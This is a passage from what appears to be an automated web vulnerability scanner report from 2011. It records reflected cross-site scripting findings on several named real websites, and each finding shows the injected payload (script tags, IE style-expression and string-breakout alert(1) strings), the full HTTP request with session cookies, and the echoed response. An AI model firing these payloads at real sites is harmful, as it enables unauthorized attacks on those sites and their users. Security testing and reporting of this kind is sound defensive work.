Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117455
Date: Tue, 19 Jul 2011 16:02:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:37 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,4294; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/JavaScript/CertonaTable.htm757bf' a=b 29f44a6dade' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.136. http://www.gamestop.com/Recommendations.axd [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.gamestop.com
Path:	/Recommendations.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 32a35'%20a%3db%20af794d36cbc was submitted in the REST URL parameter 1. This input was echoed as 32a35' a=b af794d36cbc in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /Recommendations.axd32a35'%20a%3db%20af794d36cbc HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
Content-Length: 122
Origin: http://www.gamestop.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LocaleCookie=en-us; MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; CactusState=V=1; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

{"l":"peYfab2EsTTWwlqkVMgA4Q==","r":"rcxKUs77Dw02ESv5cb+e+w==","rr":"IF8Yy95dSt9Ecb50XY6Mog==","c":"Locale=en-US","su":""}

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117439
Date: Tue, 19 Jul 2011 16:02:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:40 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,4294; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/Recommendations.axd32a35' a=b af794d36cbc' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.137. http://www.gamestop.com/ScriptResource.axd [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.gamestop.com
Path:	/ScriptResource.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb13a'%20a%3db%208855338f870 was submitted in the REST URL parameter 1. This input was echoed as eb13a' a=b 8855338f870 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ScriptResource.axdeb13a'%20a%3db%208855338f870?d=JUWzwDM6J1O9dvzPL3WifBcDrceKUILBVALOotNA8ZNC3NRB-tqVx2rqwB4j25dIdNmSckr1NnDdVSb8someErW3DymlJx0hNOZI23Og7ARy99QWf-Fc0jT2IBslLCo2KmsaCC6X_4v932KibHmTRWWUGBk1&t=ffffffff8457574f HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LocaleCookie=en-us; MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; CactusState=V=1; BIGipServerwww.gamestop.com-80=650777772.20480.0000

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 118139
Date: Tue, 19 Jul 2011 16:02:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:29 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/ScriptResource.axdeb13a' a=b 8855338f870?d=JUWzwDM6J1O9dvzPL3WifBcDrceKUILBVALOotNA8ZNC3NRB-tqVx2rqwB4j25dIdNmSckr1NnDdVSb8someErW3DymlJx0hNOZI23Og7ARy99QWf-Fc0jT2IBslLCo2KmsaCC6X_4v932KibHmTRWWUGBk1%26t=ffffffff8457574f' id='header_auth_act
...[SNIP]...

4.138. http://www.gamestop.com/WebResource.axd [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.gamestop.com
Path:	/WebResource.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d6bec'%20a%3db%2082afe38e9ca was submitted in the REST URL parameter 1. This input was echoed as d6bec' a=b 82afe38e9ca in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /WebResource.axdd6bec'%20a%3db%2082afe38e9ca?d=m1DsqMTwlT-RGKCtGfxYBloVHh8h1knnFeXre9UxNqlvQUJW8dGTdDWRsiHUrmCXBrjrQGgZOAdWXPjXXqW6hMxBZ5dbvnDeZYCfMfzz3iK7REQi4IgFM-qEapKq_OJ4cGSjRI07slCVxwBCJybWFmGxp6tqRzha4upPnJ4xzb8zhk060&t=634465910017528089 HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LocaleCookie=en-us; MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; CactusState=V=1; BIGipServerwww.gamestop.com-80=650777772.20480.0000

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117835
Date: Tue, 19 Jul 2011 16:02:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:28 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,4294; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/WebResource.axdd6bec' a=b 82afe38e9ca?d=m1DsqMTwlT-RGKCtGfxYBloVHh8h1knnFeXre9UxNqlvQUJW8dGTdDWRsiHUrmCXBrjrQGgZOAdWXPjXXqW6hMxBZ5dbvnDeZYCfMfzz3iK7REQi4IgFM-qEapKq_OJ4cGSjRI07slCVxwBCJybWFmGxp6tqRzha4upPnJ4xzb8zhk060%26t=6344659100175280
...[SNIP]...

4.139. http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.gamestop.com
Path:	/common/gui/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c2cca'%20a%3db%20760b5dafaf4 was submitted in the REST URL parameter 1. This input was echoed as c2cca' a=b 760b5dafaf4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commonc2cca'%20a%3db%20760b5dafaf4/gui/favicon.ico HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=783322707284241; RES_SESSIONID=463845686754211; ResonanceSegment=1; rsi_segs=D08734_70056|D08734_70065|10165; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B%20s_ppv%3D26%252C26%252C723%3B

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Content-Type: text/html; charset=utf-8
Content-Length: 117789
Cache-Control: private, max-age=86400
Date: Tue, 19 Jul 2011 16:02:40 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/commonc2cca' a=b 760b5dafaf4/gui/favicon.ico' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.140. http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamestop.com
Path:	/common/gui/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89455'style%3d'x%3aexpression(alert(1))'346df7674c3 was submitted in the REST URL parameter 2. This input was echoed as 89455'style='x:expression(alert(1))'346df7674c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /common/gui89455'style%3d'x%3aexpression(alert(1))'346df7674c3/favicon.ico HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=783322707284241; RES_SESSIONID=463845686754211; ResonanceSegment=1; rsi_segs=D08734_70056|D08734_70065|10165; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B%20s_ppv%3D26%252C26%252C723%3B

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Content-Type: text/html; charset=utf-8
Content-Length: 117835
Cache-Control: private, max-age=86394
Date: Tue, 19 Jul 2011 16:02:44 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/common/gui89455'style='x:expression(alert(1))'346df7674c3/favicon.ico' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.141. http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamestop.com
Path:	/common/gui/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 38729'style%3d'x%3aexpression(alert(1))'5d861ec7448 was submitted in the REST URL parameter 3. This input was echoed as 38729'style='x:expression(alert(1))'5d861ec7448 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /common/gui/favicon.ico38729'style%3d'x%3aexpression(alert(1))'5d861ec7448 HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=783322707284241; RES_SESSIONID=463845686754211; ResonanceSegment=1; rsi_segs=D08734_70056|D08734_70065|10165; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B%20s_ppv%3D26%252C26%252C723%3B

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117491
Date: Tue, 19 Jul 2011 16:02:46 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:47 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,4294; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/common/gui/favicon.ico38729'style='x:expression(alert(1))'5d861ec7448' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.142. http://www.netlogiq.ro/Portofoliu-Web-Design.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlogiq.ro
Path:	/Portofoliu-Web-Design.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ac71"><script>alert(1)</script>251e3ca71be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Portofoliu-Web-Design.html?6ac71"><script>alert(1)</script>251e3ca71be=1 HTTP/1.1
Host: www.netlogiq.ro
Proxy-Connection: keep-alive
Referer: http://www.netlogiq.ro/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rlrppqzm2x1g1e45vesnu245; sifrFetch=true; __utma=147345704.25025431.1311097255.1311097255.1311097255.1; __utmb=147345704.1.10.1311097255; __utmc=147345704; __utmz=147345704.1311097255.1.1.utmcsr=umfcluj.ro|utmccn=(referral)|utmcmd=referral|utmcct=/search.aspx

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:44:45 GMT
Content-Length: 224574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
<a href="/Portofoliu-Web-Design?6ac71"><script>alert(1)</script>251e3ca71be=1--cID105--y0--m0--pag1.html ">
...[SNIP]...

4.143. http://www.stumbleupon.com/submit [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/submit

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e4de"style%3d"x%3aexpression(alert(1))"0d3e962a0e4 was submitted in the url parameter. This input was echoed as 4e4de"style="x:expression(alert(1))"0d3e962a0e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /submit?url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity4e4de"style%3d"x%3aexpression(alert(1))"0d3e962a0e4&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=189632489.866859479.1307275364.1307275364.1307312449.2; __utmv=189632489.|1=user_class=v=1,; su_conf=cfcd208495d565ef66e7dff9f98764da; cmf_i=309046094e1443cb1cc136.64488011; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit

Response

4.144. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.boston/be_bus

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3771'%3balert(1)//8c917a196fd was submitted in the cli cookie. This input was echoed as c3771';alert(1)//8c917a196fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/q1.q.boston/be_bus;sz=160x600;net=q1;ord=1807584008;ord1=317259;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83cc3771'%3balert(1)//8c917a196fd; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

4.145. http://a.collective-media.net/cmadj/q1.q.boston/be_home [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.boston/be_home

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7628e'%3balert(1)//4dbde60b8a6 was submitted in the cli cookie. This input was echoed as 7628e';alert(1)//4dbde60b8a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/q1.q.boston/be_home;sz=728x90;net=q1;ord=84105094;ord1=58867;cmpgurl=http%253A//boston.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c7628e'%3balert(1)//4dbde60b8a6; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:42:38 GMT
Content-Length: 7652
Connection: close
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
